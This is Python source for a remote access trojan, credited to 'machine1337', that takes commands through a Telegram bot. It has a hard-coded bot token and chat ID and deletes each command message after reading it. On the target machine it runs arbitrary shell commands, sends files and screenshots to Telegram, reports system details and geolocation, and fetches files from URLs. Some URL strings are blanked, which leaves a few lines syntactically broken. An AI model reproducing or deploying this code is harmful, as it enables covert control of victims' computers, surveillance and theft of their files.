import os import platform import requests import subprocess import time try: from PIL import ImageGrab except ImportError: if platform.system().startswith("Windows"): os.system("python -m pip install pillow -q -q -q") from PIL import ImageGrab elif platform.system().startswith("Linux"): os.system("python3 -m pip install pillow -q -q -q") from PIL import ImageGrab TOKEN = '7120967822:AAFJJWrQkBCQOhzi0TXM1p-lk430f2H0elg' #change the token here CHAT_ID = '6556448976' #change the chat id here processed_message_ids = [] def get_updates(offset=None): url = f"{TOKEN}/getUpdates" params = {'offset': offset, 'timeout': 60} response = requests.get(url, params=params) if response.status_code == 200: data = response.json() return data.get('result', []) else: print(f"Failed to get updates. Status code: {response.status_code}") return [] def delete_message(message_id): url = f"{TOKEN}/deleteMessage" params = {'chat_id': CHAT_ID, 'message_id': message_id} response = requests.get(url, params=params) if response.status_code != 200: print(f"Failed to delete message. Status code:") #coded by machine1337 def execute_command(command): if command == 'cd ..': os.chdir('..') return "Changed current directory to: " + os.getcwd() elif command == 'location': response = requests.get('') public_ip = response.text.strip() try: url = f'{public_ip}' response = requests.get(url) data = response.json() country = data.get('country') region = data.get('region') city = data.get('city') lat = data.get('lat') lon = data.get('lon') timezone = data.get('timezone') isp = data.get('isp') final = f"Country: {country},\nRegion: {region},\nCity: {city},\nLatitude: {lat},\nLongitude: {lon},\nTimezone: {timezone},\nISP: {isp}" return final except Exception as e: return 'Some shit occured' elif command == 'info': system_info = { 'Platform': platform.platform(), 'System': platform.system(), 'Node Name': platform.node(), 'Release': platform.release(), 'Version': platform.version(), 'Machine': platform.machine(), 'Processor': platform.processor(), 'CPU Cores': os.cpu_count(), 'Username': os.getlogin(), } info_string = '\n'.join(f"{key}: {value}" for key, value in system_info.items()) return info_string elif command == 'screenshot': file_path = "screenshot.png" try: screenshot = ImageGrab.grab() print(f"Screenshot saved to {file_path}") send_file(file_path) os.remove(file_path) return "Screenshot sent to Telegram." except Exception as e: return f"Error taking screenshot: {e}" elif command == 'help': return ''' HELP MENU: Coded By Machine1337 CMD Commands | Execute cmd commands directly in bot cd .. | Change the current directory cd foldername | Change to current folder download filename | Download File From Target screenshot | Capture Screenshot info | Get System Info location | Get Target Location get url | Download File From URL (provide direct link) ''' elif command.startswith('download '): filename = command[ 9:].strip() if os.path.isfile(filename): send_file(filename) return f"File '{filename}' sent to Telegram." else: return f"File '{filename}' not found." elif command.startswith('get '): url = command[4:].strip() try: download = requests.get(url) if download.status_code == 200: file_name = url.split('/')[-1] with open(file_name, 'wb') as out_file: out_file.write(download.content) return f"File downloaded and saved as '{file_name}'." else: return f"Failed to download file from URL: {url}. Status Code: {download.status_code}" except Exception as e: return f"Failed to download file from URL: {url}. Error: {str(e)}" elif command.startswith('cd '): foldername = command[3:].strip() try: os.chdir(foldername) return "Directory Changed To: " + os.getcwd() except FileNotFoundError: return f"Directory not found: {foldername}" except Exception as e: return f"Failed to change directory. Error: {str(e)}" else: try: result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT) return result.decode('utf-8').strip() except subprocess.CalledProcessError as e: return f"Command execution failed. Error: {e.output.decode('utf-8').strip()}" def send_file(filename): url = f"{TOKEN}/sendDocument" with open(filename, 'rb') as file: files = {'document': file} data = {'chat_id': CHAT_ID} response =, data=data, files=files) if response.status_code != 200: print(f"Failed to send file.") def handle_updates(updates): highest_update_id = 0 for update in updates: if 'message' in update and 'text' in update['message']: message_text = update['message']['text'] message_id = update['message']['message_id'] if message_id in processed_message_ids: continue processed_message_ids.append(message_id) delete_message(message_id) result = execute_command(message_text) if result: send_message(result) update_id = update['update_id'] if update_id > highest_update_id: highest_update_id = update_id return highest_update_id def send_message(text): url = f"{TOKEN}/sendMessage" params = { 'chat_id': CHAT_ID, 'text': text } response = requests.get(url, params=params) if response.status_code != 200: print(f"Failed to send message.") def main(): offset = None while True: updates = get_updates(offset) if updates: offset = handle_updates(updates) + 1 processed_message_ids.clear() else: print("No updates found.") time.sleep(1) if __name__ == '__main__': main()